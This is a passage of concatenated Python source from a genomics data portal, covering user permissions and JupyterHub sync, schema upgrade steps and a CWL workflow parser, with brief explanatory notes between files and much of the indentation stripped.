return None
    with open(full_file_path, encoding="utf-8") as f:
        output = f.read()
    return output
def get_remote_file_contents(uri):
resp = requests.get(uri)
return resp.text
```
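`StaticSection.filetype` above resolves the type in a fixed order: an explicit `options.filetype`, then the kind of `body`, then the extension of `file`, falling back to `txt` when there is no extension. A standalone restatement of that precedence (the example paths and values are made up):
```python
def infer_filetype(body=None, file=None, options=None):
    # same precedence as StaticSection.filetype above
    if options and options.get('filetype') is not None:
        return options['filetype']
    if isinstance(body, str):
        return 'txt'
    if isinstance(body, (dict, list)):
        return 'json'
    if isinstance(file, str):
        parts = file.split('.')
        return parts[-1] if len(parts) > 1 else 'txt'
    return None

assert infer_filetype(body={'rows': []}) == 'json'
assert infer_filetype(file='/docs/help-page.md') == 'md'
assert infer_filetype(file='README', options={'filetype': 'rst'}) == 'rst'
```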
#### File: encoded/types/user.py
```python
import logging
import requests
import structlog
import transaction
from pyramid.view import (
view_config,
)
from pyramid.httpexceptions import HTTPUnprocessableEntity
from pyramid.security import (
Allow,
Deny,
Everyone,
)
from .base import Item
from snovault import (
CONNECTION,
calculated_property,
collection,
load_schema,
)
from snovault.storage import User as AuthUser
from snovault.schema_utils import validate_request
from snovault.crud_views import collection_add
# from snovault.calculated import calculate_properties
from snovault.resource_views import item_view_page
from snovault.util import debug_log
from dcicutils.env_utils import is_fourfront_env, is_stg_or_prd_env
from dcicutils.s3_utils import s3Utils
logging.getLogger('boto3').setLevel(logging.WARNING)
log = structlog.getLogger(__name__)
ONLY_ADMIN_VIEW_DETAILS = [
(Allow, 'group.admin', ['view', 'view_details', 'edit']),
(Allow, 'group.read-only-admin', ['view', 'view_details']),
(Allow, 'remoteuser.INDEXER', ['view']),
(Allow, 'remoteuser.EMBED', ['view']),
(Deny, Everyone, ['view', 'view_details', 'edit']),
]
SUBMITTER_CREATE = []
ONLY_OWNER_EDIT = [
(Allow, 'role.owner', 'view'),
(Allow, 'role.owner', 'edit'),
(Allow, 'role.owner', 'view_details')
] + ONLY_ADMIN_VIEW_DETAILS
USER_ALLOW_CURRENT = [
(Allow, Everyone, 'view'),
] + ONLY_ADMIN_VIEW_DETAILS
USER_DELETED = [
(Deny, Everyone, 'visible_for_edit')
] + ONLY_ADMIN_VIEW_DETAILS
def _build_user_embedded_list():
""" Helper function intended to be used to create the embedded list for user.
All types should implement a function like this going forward.
"""
return [
# Lab linkTo
'lab.name',
# Award linkTo
'lab.awards.name',
'lab.awards.project',
# Lab linkTo
'submits_for.name',
]
@collection(
name='users',
unique_key='user:email',
properties={
'title': '4D Nucleome Users',
'description': 'Listing of current 4D Nucleome DCIC users',
},
acl=[])
class User(Item):
"""The user class."""
item_type = 'user'
schema = load_schema('encoded:schemas/user.json')
embedded_list = _build_user_embedded_list()
STATUS_ACL = {
'current': ONLY_OWNER_EDIT,
'deleted': USER_DELETED,
'replaced': USER_DELETED,
'revoked': ONLY_ADMIN_VIEW_DETAILS,
}
@calculated_property(schema={
"title": "Title",
"type": "string",
})
def title(self, first_name, last_name):
"""return first and last name."""
title = u'{} {}'.format(first_name, last_name)
return title
@calculated_property(schema={
"title": "Display Title",
"description": "A calculated title for every object in 4DN",
"type": "string"
})
def display_title(self, first_name, last_name):
return self.title(first_name, last_name)
@calculated_property(schema={
"title": "Contact Email",
"description": "E-Mail address by which this person should be contacted.",
"type": "string",
"format": "email"
})
def contact_email(self, email, preferred_email=None):
"""Returns `email` if `preferred_email` is not defined."""
if preferred_email:
return preferred_email
else:
return email
def __ac_local_roles__(self):
"""return the owner user."""
owner = 'userid.%s' % self.uuid
return {owner: 'role.owner'}
def _update(self, properties, sheets=None):
# subscriptions are search queries used on /submissions page
# always overwrite subscriptions on an update
new_subscriptions = []
if properties.get('submits_for'):
new_subscriptions.append({
'title': 'My submissions',
'url': '?submitted_by.uuid=%s&sort=-date_created' % str(self.uuid)
})
if properties.get('lab'):
new_subscriptions.append({
'title': 'Submissions for my lab',
'url': '?lab.uuid=%s&sort=-date_created' % properties['lab']
})
properties['subscriptions'] = new_subscriptions
# if we are on a production environment, make sure there is an account for the
# user that reflects any email changes
ff_env = self.registry.settings.get('env.name')
# compare previous and updated emails, respectively
try:
prev_email = self.properties.get('email')
except KeyError: # if new user, previous properties do not exist
prev_email = None
new_email = properties.get('email')
update_email = new_email if prev_email != new_email else None
# Is this only for fourfront or does cgap want to do this, too? -kmp 3-Apr-2020
if ff_env is not None and update_email is not None and is_fourfront_env(ff_env) and is_stg_or_prd_env(ff_env):
try:
s3Obj = s3Utils(env='data')
jh_key = s3Obj.get_jupyterhub_key()
jh_endpoint = ''.join([jh_key['server'], '/hub/api/users/', update_email])
jh_headers = {'Authorization': 'token %s' % jh_key['secret']}
res = requests.post(jh_endpoint, headers=jh_headers)
except Exception as jh_exc:
log.error('Error posting user %s to JupyterHub' % update_email,
error=str(jh_exc))
else:
log.info('Updating user %s on JupyterHub. Result: %s' % (update_email, res.text))
super(User, self)._update(properties, sheets)
@view_config(context=User, permission='view', request_method='GET', name='page')
@debug_log
def user_page_view(context, request):
"""smth."""
properties = item_view_page(context, request)
if not request.has_permission('view_details'):
filtered = {}
for key in ['@id', '@type', 'uuid', 'lab', 'title', 'display_title']:
try:
filtered[key] = properties[key]
except KeyError:
pass
return filtered
return properties
@view_config(context=User.Collection, permission='add', request_method='POST',
physical_path="/users")
@debug_log
def user_add(context, request):
'''
if we have a password in our request, create and auth entry
for the user as well
'''
# do we have valid data
    pwd = request.json.get('password', None)
pwd_less_data = request.json.copy()
if pwd is not None:
del pwd_less_data['password']
validate_request(context.type_info.schema, request, pwd_less_data)
if request.errors:
return HTTPUnprocessableEntity(json={'errors': request.errors},
content_type='application/json')
result = collection_add(context, request)
if result:
email = request.json.get('email')
pwd = request.json.get('password', None)
name = request.json.get('first_name')
if pwd is not None:
auth_user = AuthUser(email, pwd, name)
db = request.registry['dbsession']
db.add(auth_user)
transaction.commit()
return result
@calculated_property(context=User, category='user_action')
def impersonate(context, request):
"""smth."""
# This is assuming the user_action calculated properties
# will only be fetched from the current_user view,
# which ensures that the user represented by 'context' is also an effective principal
if request.has_permission('impersonate'):
return {
'id': 'impersonate',
'title': 'Impersonate User…',
'href': request.resource_path(context) + '?currentAction=impersonate-user',
}
@calculated_property(context=User, category='user_action')
def profile(context, request):
"""smth."""
return {
'id': 'profile',
'title': 'Profile',
'href': request.resource_path(context),
}
@calculated_property(context=User, category='user_action')
def submissions(request):
"""smth."""
return {
'id': 'submissions',
'title': 'Submissions',
'href': '/submissions',
}
```
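`User._update` above rebuilds `subscriptions` from scratch on every update: one entry keyed on the user's own uuid when `submits_for` is set, and one keyed on the lab uuid when `lab` is set. Roughly what gets stored for a user with both (uuids are placeholders):
```python
# Approximate 'subscriptions' value produced by User._update above.
user_uuid = '11111111-1111-1111-1111-111111111111'  # placeholder
lab_uuid = '22222222-2222-2222-2222-222222222222'   # placeholder
subscriptions = [
    {'title': 'My submissions',
     'url': '?submitted_by.uuid=%s&sort=-date_created' % user_uuid},
    {'title': 'Submissions for my lab',
     'url': '?lab.uuid=%s&sort=-date_created' % lab_uuid},
]
```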
#### File: encoded/upgrade/biosample.py
```python
from snovault import upgrade_step
@upgrade_step('biosample', '1', '2')
def biosample_1_2(value, system):
if 'cell_culture_details' in value:
value['cell_culture_details'] = [value['cell_culture_details']]
```
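The `biosample` '1' to '2' step above only wraps a single `cell_culture_details` link in a list. A before/after sketch with the transformation restated inline (the uuid is a placeholder):
```python
value = {'cell_culture_details': 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee'}  # placeholder uuid
if 'cell_culture_details' in value:
    value['cell_culture_details'] = [value['cell_culture_details']]
assert value['cell_culture_details'] == ['aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee']
```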
#### File: encoded/upgrade/experiment.py
```python
from snovault import upgrade_step
from . import _get_biofeat_for_target as getbf4t
@upgrade_step('experiment_repliseq', '1', '2')
def experiment_repliseq_1_2(value, system):
if value['experiment_type'] == 'repliseq':
value['experiment_type'] = 'Repli-seq'
@upgrade_step('experiment_repliseq', '2', '3')
def experiment_repliseq_2_3(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
# if antibody_lot_id exists it should be fine in new field
@upgrade_step('experiment_chiapet', '1', '2')
def experiment_chiapet_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_chiapet', '2', '3')
def experiment_chiapet_2_3(value, system):
if value.get('experiment_type') == 'CHIA-pet':
value['experiment_type'] = 'ChIA-PET'
@upgrade_step('experiment_damid', '1', '2')
def experiment_damid_1_2(value, system):
if value.get('index_pcr_cycles'):
value['pcr_cycles'] = value['index_pcr_cycles']
del value['index_pcr_cycles']
if value.get('fusion'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['fusion']
else:
value['notes'] = value['fusion']
del value['fusion']
@upgrade_step('experiment_mic', '1', '2')
def experiment_mic_1_2(value, system):
fish_dict = {'DNA-FiSH': 'DNA FISH', 'RNA-FiSH': 'RNA FISH', 'FiSH': 'FISH'}
if value.get('experiment_type') and value['experiment_type'] in fish_dict.keys():
value['experiment_type'] = fish_dict[value['experiment_type']]
@upgrade_step('experiment_seq', '1', '2')
def experiment_seq_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_seq', '2', '3')
def experiment_seq_2_3(value, system):
if value.get('experiment_type') == 'CHIP-seq':
value['experiment_type'] = 'ChIP-seq'
@upgrade_step('experiment_atacseq', '1', '2')
@upgrade_step('experiment_capture_c', '1', '2')
@upgrade_step('experiment_chiapet', '3', '4')
@upgrade_step('experiment_damid', '2', '3')
@upgrade_step('experiment_hi_c', '1', '2')
@upgrade_step('experiment_mic', '2', '3')
@upgrade_step('experiment_repliseq', '3', '4')
@upgrade_step('experiment_seq', '3', '4')
@upgrade_step('experiment_tsaseq', '1', '2')
def experiment_1_2(value, system):
exptype = value.get('experiment_type')
if exptype == 'Repli-seq':
tot_fracs = value.get('total_fractions_in_exp', 2)
if tot_fracs > 2:
exptype = 'Multi-stage Repli-seq'
else:
exptype = '2-stage Repli-seq'
elif exptype == 'DAM-ID seq':
exptype = 'DamID-seq'
valid_exptypes = system['registry']['collections']['ExperimentType']
exptype_item = valid_exptypes.get(exptype)
if not exptype_item:
exptypename = exptype.lower().replace(' ', '-')
exptype_item = valid_exptypes.get(exptypename)
exptype_uuid = None
try:
exptype_uuid = str(exptype_item.uuid)
except AttributeError:
note = '{} ITEM NOT FOUND'.format(exptype)
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
value['experiment_type'] = exptype_uuid
@upgrade_step('experiment_seq', '4', '5')
@upgrade_step('experiment_chiapet', '4', '5')
@upgrade_step('experiment_damid', '3', '4')
@upgrade_step('experiment_tsaseq', '2', '3')
def experiment_targeted_factor_upgrade(value, system):
factor = value.get('targeted_factor')
if factor:
del value['targeted_factor']
note = 'Old Target: {}'.format(factor)
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
target = targets.get(factor)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
value['targeted_factor'] = [bfuuid]
else:
note = 'UPDATE NEEDED: ' + note
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
@upgrade_step('experiment_capture_c', '2', '3')
def experiment_capture_c_1_2(value, system):
tregions = value.get('targeted_regions')
if tregions:
new_vals = []
del value['targeted_regions']
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
note = ''
for tr in tregions:
t = tr.get('target') # it's required
of = tr.get('oligo_file', '')
tstr = 'Old Target: {} {}'.format(t, of)
target = targets.get(t)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
tinfo = {'target': [bfuuid]}
if of:
tinfo['oligo_file'] = of
new_vals.append(tinfo)
else:
tstr = 'UPDATE NEEDED: ' + tstr
note += tstr
if new_vals:
value['targeted_regions'] = new_vals
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
```
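Several of the steps above (`experiment_repliseq` 2 to 3, `experiment_chiapet` 1 to 2, `experiment_seq` 1 to 2) move the old free-text `antibody` value into `notes` for later manual linking to an Antibody item. A sketch of that migration with the logic restated inline; the antibody string and existing note are made up for illustration.
```python
value = {'antibody': 'anti-CTCF rabbit polyclonal', 'notes': 'existing note'}
if value.get('antibody'):
    if value.get('notes'):
        value['notes'] = value['notes'] + '; ' + value['antibody']
    else:
        value['notes'] = value['antibody']
    del value['antibody']
assert value == {'notes': 'existing note; anti-CTCF rabbit polyclonal'}
```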
#### File: encoded/upgrade/experiment_set.py
```python
from snovault import upgrade_step
@upgrade_step('experiment_set', '1', '2')
def experiment_set_1_2(value, system):
if 'date_released' in value:
value['public_release'] = value['date_released']
del value['date_released']
@upgrade_step('experiment_set_replicate', '1', '2')
def experiment_set_replicate_1_2(value, system):
if 'date_released' in value:
value['public_release'] = value['date_released']
del value['date_released']
```
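Both experiment set steps above simply rename `date_released` to `public_release`. Restated inline (the date is a placeholder):
```python
value = {'date_released': '2017-01-01'}  # placeholder date
if 'date_released' in value:
    value['public_release'] = value['date_released']
    del value['date_released']
assert value == {'public_release': '2017-01-01'}
```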
#### File: encoded/upgrade/file.py
```python
from snovault import (
upgrade_step,
)
@upgrade_step('file_fastq', '1', '2')
@upgrade_step('file_calibration', '1', '2')
@upgrade_step('file_microscopy', '1', '2')
@upgrade_step('file_processed', '1', '2')
@upgrade_step('file_reference', '1', '2')
def file_1_2(value, system):
file_format = value.get('file_format')
formats = system['registry']['collections']['FileFormat']
format_item = formats.get(file_format)
fuuid = None
try:
fuuid = str(format_item.uuid)
except AttributeError:
pass
if not fuuid:
other_format = formats.get('other')
fuuid = str(other_format.uuid)
note = value.get('notes', '')
note = note + ' FILE FORMAT: ' + file_format
value['notes'] = note
value['file_format'] = fuuid
# need to also check for extra files to upgrade_step
extras = value.get('extra_files')
if extras:
for i, extra in enumerate(extras):
eformat = extra.get('file_format')
eformat_item = formats.get(eformat)
efuuid = None
try:
efuuid = str(eformat_item.uuid)
except AttributeError:
pass
if not efuuid:
other_format = formats.get('other')
efuuid = str(other_format.uuid)
note = value.get('notes', '')
note = note + ' EXTRA FILE FORMAT: ' + str(i) + '-' + eformat
value['notes'] = note
value['extra_files'][i]['file_format'] = efuuid
@upgrade_step('file_processed', '2', '3')
@upgrade_step('file_vistrack', '1', '2')
def file_track_data_upgrade(value, system):
field_map = {
"dataset_type": "override_experiment_type",
"assay_info": "override_assay_info",
"replicate_identifiers": "override_replicate_info",
"biosource_name": "override_biosource_name",
"experiment_bucket": "override_experiment_bucket",
"project_lab": "override_lab_name"
}
for oldprop, newprop in field_map.items():
oldpropval = value.get(oldprop)
if oldpropval:
if oldprop == 'replicate_identifiers':
if len(oldpropval) > 1:
oldpropval = 'merged replicates'
else:
oldpropval = oldpropval[0]
value[newprop] = oldpropval
del value[oldprop]
```
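In `file_track_data_upgrade` above, each old tracking field is renamed to its `override_*` counterpart, and a multi-element `replicate_identifiers` list collapses to the string 'merged replicates'. A sketch of just that case, with the replicate labels made up for illustration:
```python
value = {'replicate_identifiers': ['Biorep 1, Techrep 1', 'Biorep 1, Techrep 2']}
reps = value.pop('replicate_identifiers')
value['override_replicate_info'] = 'merged replicates' if len(reps) > 1 else reps[0]
assert value == {'override_replicate_info': 'merged replicates'}
```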
#### File: encoded/upgrade/imaging_path.py
```python
from snovault import upgrade_step
from . import _get_biofeat_for_target as getbf4t
@upgrade_step('imaging_path', '1', '2')
def imaging_path_1_2(value, system):
''' convert targets to biofeatures '''
iptargets = value.get('target')
if iptargets:
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
del value['target']
note = 'Old Target: {}'.format(iptargets)
targets2add = []
for ipt in iptargets:
target = targets.get(ipt)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
targets2add.append(bfuuid)
else:
note += 'UPDATE NEEDED {}; '.format(ipt)
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
value['target'] = targets2add
```
#### File: encoded/upgrade/static_section.py
```python
from snovault import (
upgrade_step,
)
@upgrade_step('static_section', '1', '2')
def static_section_1_2(value, system):
# Rename/move sections
if value['name'] == "help#introduction":
value['name'] = "help.user-guide.data-organization.introduction"
if value['name'] == "help#carousel-place-holder":
value['name'] = "help.user-guide.data-organization.carousel-place-holder"
if value['name'] == "help#introduction2":
value['name'] = "help.user-guide.data-organization.introduction2"
if value['name'] == "help.account-creation#account_creation":
value['name'] = "help.user-guide.account-creation.account_creation"
if value['name'] == "help.getting-started#getting_started":
value['name'] = "help.user-guide.getting-started.getting_started"
if value['name'] == "help.biosample#metadata":
value['name'] = "help.submitter-guide.biosample-metadata.metadata"
if value['name'] == "help.spreadsheet#excel_submission":
value['name'] = "help.submitter-guide.spreadsheet.excel_submission"
if value['name'] == "help.spreadsheet#schema_info":
value['name'] = "help.submitter-guide.spreadsheet.schema_info"
if value['name'] == "help.rest-api#rest_api_submission":
value['name'] = "help.submitter-guide.rest-api.rest_api_submission"
if value['name'] == "help.data-processing-pipelines":
value['name'] = "help.analysis.cwl-docker.data-processing-pipelines"
if value['name'] == "help.spreadsheet#schema_info":
value['name'] = "help.submitter-guide.spreadsheet.schema_info"
if "#" in value['name']:
value['name'] = value['name'].replace('#', '.', 1)
```
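After the explicit renames above, any remaining section name that still contains '#' has only its first '#' converted to '.'. For example (the name below is made up and not covered by the explicit renames):
```python
value = {'name': 'help.some-page#some_section'}
if "#" in value['name']:
    value['name'] = value['name'].replace('#', '.', 1)
assert value['name'] == 'help.some-page.some_section'
```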
#### File: encoded/upgrade/workflow_run.py
```python
from snovault import (
upgrade_step,
)
@upgrade_step('workflow_run_awsem', '1', '2')
@upgrade_step('workflow_run_sbg', '1', '2')
@upgrade_step('workflow_run', '1', '2')
def workflow_run_1_2(value, system):
'''Change input_files.format_if_extra to FileFormat'''
formats = system['registry']['collections']['FileFormat']
input_files = value.get('input_files', [])
for i, infile in enumerate(input_files):
if 'format_if_extra' not in infile:
continue
eformat_item = formats.get(infile['format_if_extra'])
efuuid = None
try:
efuuid = str(eformat_item.uuid)
except AttributeError:
pass
if not efuuid:
msg = 'EXTRA_FILE_FORMAT: %s NOT FOUND' % infile['format_if_extra']
note = value['input_files'][i].get('notes', '')
msg = ' '.join([note, msg])
value['input_files'][i]['notes'] = msg
del value['input_files'][i]['format_if_extra']
else:
value['input_files'][i]['format_if_extra'] = efuuid
@upgrade_step('workflow_run_awsem', '2', '3')
@upgrade_step('workflow_run_sbg', '2', '3')
@upgrade_step('workflow_run', '2', '3')
def workflow_run_2_3(value, system):
if 'output_quality_metrics' in value:
del value['output_quality_metrics']
```
#### File: encoded/workflow_examples/read_cwl_create_workflow_insert.py
```python
import json
import sys
import random
def generate_uuid ():
rand_uuid_start=''
for i in range(8):
r=random.choice('abcdef1234567890')
rand_uuid_start += r
uuid=rand_uuid_start + "-49e5-4c33-afab-9ec90d65faf3"
return uuid
# function that parses the 'source' field of CWL, which contains information about step and argument names.
# it returns a dictionary with 'step' and 'arg' as keys.
# if the source is global, 'step' will be ''.
def parse_source(source_str):
source={}
source_str = source_str.strip('#')
if '.' in source_str: ## the format is #step.ID, so if '.' doesn't exist, that implies this is a global argument.
## step argument ##
source_arr = source_str.split(".")
source['step'] = source_arr[0]
source['arg'] = source_arr[1]
else:
## global argument ##
source['step'] = ''
source['arg'] = source_str
return(source)
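# For reference, a couple of illustrative (made-up) source strings and what
# parse_source returns for them:
#   parse_source('#step_bwa.out_bam')  -> {'step': 'step_bwa', 'arg': 'out_bam'}
#   parse_source('#input_fastq')       -> {'step': '', 'arg': 'input_fastq'}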
# given the type field of an element of cwl_dict['inputs'] (e.g. cwl_dict['inputs'][1]['type'], return either 'Input file' or 'parameter'.
def Is_Input_file_or_parameter ( cwl_param_type ):
argument_type='parameter' ## default is parameter unless the following conditions meet
if isinstance(cwl_param_type,list):
if 'File' in cwl_param_type: # e.g. type=[ 'File','null' ] (SBG)
argument_type='Input file'
elif isinstance(cwl_param_type[0],dict) and cwl_param_type[0]['type']=='array' and cwl_param_type[0]['items']=='File': # e.g. type=[{'type':'array','items':'File'}] (SBG)
argument_type='Input file'
elif cwl_param_type=='File': # e.g. type='File'
argument_type='Input file'
elif isinstance(cwl_param_type,dict) and cwl_param_type['type']=='array' and cwl_param_type['items']=='File': # e.g. type={'type':'array','items':'File'}
argument_type='Input file'
return argument_type
# Add a workflow output argument and map to the step output argument.
# for now we assume that 1. a global output argument has a single source and 2. that it is an output of some step. (I think this is a reasonable assumption)
def map_workflow_output_argument_to_step_argument ( workflow, source, workflow_argument, step, step_argument ):
workflow['arguments'].append(
{'workflow_argument_name': workflow_argument,
'argument_type':'Output file',
'argument_mapping':[{ 'workflow_step': step,
'step_argument_name': step_argument,
'step_argument_type':'Output file'
}]
})
# Add a step argument and map to the global input source.
# Assumes the global source exists in workflow['arguments']
def map_step_argument_to_workflow_input_argument ( workflow, source, step_id, step_argument ):
if 'arguments' in workflow:
argument_index= -1
for i in range(0,len(workflow['arguments'])):
e = workflow['arguments'][i]
if e['workflow_argument_name'] == source['arg']:
argument_index = i
global_argument_type = e['argument_type']
if argument_index == -1:
sys.exit("Error: corresponding workflow argument doesn't exist: {}".format(source['arg']))
else:
sys.exit("Error: workflow argument doesn't exist.")
# fill in the workflow dictionary. The step argument type is assumed to be the same as global argument type (in this case global argument type exists and since it is the source, it is either Input file or parameter.)
workflow['arguments'][argument_index]['argument_mapping']= \
[{ 'workflow_step': step_id, # id of the step.
'step_argument_name': step_argument, # id of an input entry of the step, remove '#step' from #step.ID
'step_argument_type': global_argument_type
}]
# add a step argument and map it to another step argument
# if source step argument doesn't exist in the workflow dictionary yet, create a new entry.
# the function assumes that the source is not a global argument.
def map_step_argument_to_another_step_argument ( workflow, source, step_id, step_argument ):
if 'arguments' in workflow:
for i in range(0,len(workflow['arguments'])):
e= workflow['arguments'][i]
argument_index=-1
            if 'argument_mapping' in e:
                for e2 in e['argument_mapping']:
                    if e2['workflow_step'] == source['step'] and e2['step_argument_name'] == source['arg']:  # sourced from a previously entered entry.
argument_index=i
workflow['arguments'][argument_index]['argument_mapping']= \
[{ 'workflow_step': step_id, # id of the step.
'step_argument_name': step_argument, # id of an input entry of the step, remove '#step' from #step.ID
'step_argument_type': 'Input file or parameter'
},
{ 'workflow_step': source['step'], # id of the source step.
'step_argument_name': source['arg'],
'step_argument_type': 'Output file or parameter' # do we pass parameters between steps as well?
}]
break # in theory there should be only a single match, so break shoudn't be necessary except for saving time.
if argument_index == -1: ## corresponding source step argument doesn't exist. It may appear later in cwl.
# sys.exit("Error: corresponding source step argument doesn't exist.") # don't produce error message. create a new entry.
workflow['arguments'].append(
{'workflow_argument_name': '',
'argument_type':'',
'argument_mapping':[{ 'workflow_step': step_id,
'step_argument_name': step_argument,
'step_argument_type':'Input file or parameter' # either Input file or parameter. # Is there a way to know this from workflow cwl? I will not decide it for now : any argument that is not globally associated doesn't matter too much in terms of schema.
},
{ 'workflow_step': source['step'],
'step_argument_name': source['arg'],
'step_argument_type':'Output file or parameter' # do we pass parameters between steps as well?
}]
})
else:
sys.exit("Error: workflow argument doesn't exist.")
# function that takes a cwl file and write a workflow insert json file
def parse_cwl(cwlfile, workflow_metadata_json, workflow_name, workflow_description, workflow_type, cwl_url, uuid):
# get cwl as a dict
with open(cwlfile,'r') as f:
cwl_dict=json.load(f)
# handle SBG cwl.
if 'raw' in cwl_dict:
cwl_dict=cwl_dict['raw'] # 'some' SBG's cwl is one level down under the 'raw' field.
# initialize dictionary to write to output json file
workflow={ 'arguments':[], # this is what we will create.
"workflow_steps": [], # this, too.
"title": workflow_name,
"description": workflow_description,
"workflow_type": workflow_type,
"cwl_pointer": cwl_url,
"workflow_diagram": '',
"uuid": uuid }
# parsing global input files and parameters and storing to the workflow dictionary (can't map to step arguments yet)
# argument type is either 'Input file' or 'parameter'.
for x in cwl_dict['inputs']:
argument_type = Is_Input_file_or_parameter (x['type'])
workflow['arguments'].append({'workflow_argument_name':x['id'].strip('#'), 'argument_type':argument_type})
## parsing global output files and storing to the workflow dictionary and mapping to step arguments
## (the mapping (source) information is in the same field in cwl since the global output is usually sourced from a step output )
for x in cwl_dict['outputs']:
source = parse_source(x['source'][0])
map_workflow_output_argument_to_step_argument ( workflow, source, x['id'].strip('#'), source['step'], source['arg'] )
## parsing steps (map 1. global output files to step arguments and 2. between arguments between steps that are not globally defined)
## fill in 'arguments'
for x in cwl_dict['steps']:
for y in x['inputs']:
if 'source' in y:
source = parse_source(y['source'][0])
## case 1: global argument is the source
if source['step']=='':
map_step_argument_to_workflow_input_argument( workflow, source, x['id'].strip('#'), parse_source(y['id'])['arg'] )
## case 2: no global argument (just passing between steps)
else:
map_step_argument_to_another_step_argument( workflow, source, x['id'].strip('#'), parse_source(y['id'])['arg'] )
## case 3 (no global argument, no passing between steps) - we assume this doesn't exist.
## parsing steps again
## fill in workflow_steps.
for x in cwl_dict['steps']:
workflow['workflow_steps'].append( { 'step_name': x['id'].strip('#'), 'step': generate_uuid() } ) ## assuming that uuid for step is generated at this point? Or should we retrieve a corresponding step that already exists?
with open(workflow_metadata_json,'w') as fo:
fo.write ( json.dumps(workflow,indent=4) + "\n")
#fo.write ( cwl_dict.keys() + "\n")
#fo.write ( json.dumps(cwl_dict['outputs'],indent=4) + "\n")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="temporary cwl parser that creates a workflow insert")
parser.add_argument('-c','--cwlfile', help='input cwlfile')
parser.add_argument('-w','--workflow_metadata_json', help='output workflow metadata json file')
parser.add_argument('-n','--workflow_name', help='output workflow metadata json file')
parser.add_argument('-d','--workflow_description', help='output workflow metadata json file')
parser.add_argument('-t','--workflow_type', help='output workflow metadata json file')
parser.add_argument('-u','--cwl_url', help='output workflow metadata json file')
args = parser.parse_args()
uuid= generate_uuid()
parse_cwl(args.cwlfile, args.workflow_metadata_json, args.workflow_name, args.workflow_description, args.workflow_type, args.cwl_url, uuid )
``` |
{
"source": "4dn-dcic/foursight",
"score": 2
} |
#### File: chalicelib/checks/audit_checks.py
```python
from dcicutils import ff_utils
import re
import requests
import datetime
from .helpers import wrangler_utils
# Use confchecks to import decorators object and its methods for each check module
# rather than importing check_function, action_function, CheckResult, ActionResult
# individually - they're now part of class Decorators in foursight-core::decorators
# that requires initialization with foursight prefix.
from .helpers.confchecks import *
STATUS_LEVEL = {
'released': 4,
'archived': 4,
'current': 4,
'revoked': 4,
'released to project': 3,
'pre-release': 2,
'restricted': 4,
'planned': 2,
'archived to project': 3,
'in review by lab': 1,
'released to lab': 1,
'submission in progress': 1,
'to be uploaded by workflow': 1,
'uploading': 1,
'uploaded': 1,
'upload failed': 1,
'draft': 1,
'deleted': 0,
'replaced': 0,
'obsolete': 0,
}
@check_function()
def biosource_cell_line_value(connection, **kwargs):
'''
checks cell line biosources to make sure they have an associated ontology term
'''
check = CheckResult(connection, 'biosource_cell_line_value')
cell_line_types = ["primary cell", "primary cell line", "immortalized cell line",
"induced pluripotent stem cell", "stem cell", "stem cell derived cell line"]
biosources = ff_utils.search_metadata(
'search/?type=Biosource&cell_line.display_title=No+value&frame=object' +
''.join(['&biosource_type=' + c for c in cell_line_types]),
key=connection.ff_keys)
missing = []
for biosource in biosources:
missing.append({'uuid': biosource['uuid'],
'@id': biosource['@id'],
'biosource_type': biosource.get('biosource_type'),
'description': biosource.get('description'),
'error': 'Missing cell_line OntologyTerm'})
check.full_output = missing
check.brief_output = [item['@id'] for item in missing]
if missing:
check.status = 'WARN'
check.summary = 'Cell line biosources found missing cell_line metadata'
else:
check.status = 'PASS'
check.summary = 'No cell line biosources are missing cell_line metadata'
return check
@check_function()
def external_expsets_without_pub(connection, **kwargs):
'''
checks external experiment sets to see if they are attributed to a publication
'''
check = CheckResult(connection, 'external_expsets_without_pub')
ext = ff_utils.search_metadata('search/?award.project=External&type=ExperimentSet&frame=object',
key=connection.ff_keys, page_limit=50)
no_pub = []
for expset in ext:
if not expset.get('publications_of_set') and not expset.get('produced_in_pub'):
no_pub.append({'uuid': expset['uuid'],
'@id': expset['@id'],
'description': expset.get('description'),
'lab': expset.get('lab'),
'error': 'Missing attribution to a publication'})
if no_pub:
check.status = 'WARN'
check.summary = 'External experiment sets found without associated publication. Searched %s' % len(ext)
check.description = '{} external experiment sets are missing attribution to a publication.'.format(len(no_pub))
else:
check.status = 'PASS'
check.summary = 'No external experiment sets are missing publication. Searched %s' % len(ext)
check.description = '0 external experiment sets are missing attribution to a publication.'
check.full_output = no_pub
check.brief_output = [item['uuid'] for item in no_pub]
return check
@check_function()
def expset_opfsets_unique_titles(connection, **kwargs):
'''
checks experiment sets with other_processed_files to see if each collection
of other_processed_files has a unique title within that experiment set
'''
check = CheckResult(connection, 'expset_opfsets_unique_titles')
opf_expsets = ff_utils.search_metadata('search/?type=ExperimentSet&other_processed_files.files.uuid%21=No+value&frame=object',
key=connection.ff_keys, page_limit=50)
errors = []
for expset in opf_expsets:
e = []
fileset_names = [fileset.get('title') for fileset in expset['other_processed_files']]
if None in fileset_names or '' in fileset_names:
e.append('Missing title')
if len(list(set(fileset_names))) != len(fileset_names):
e.append('Duplicate title')
if e:
info = {'uuid': expset['uuid'],
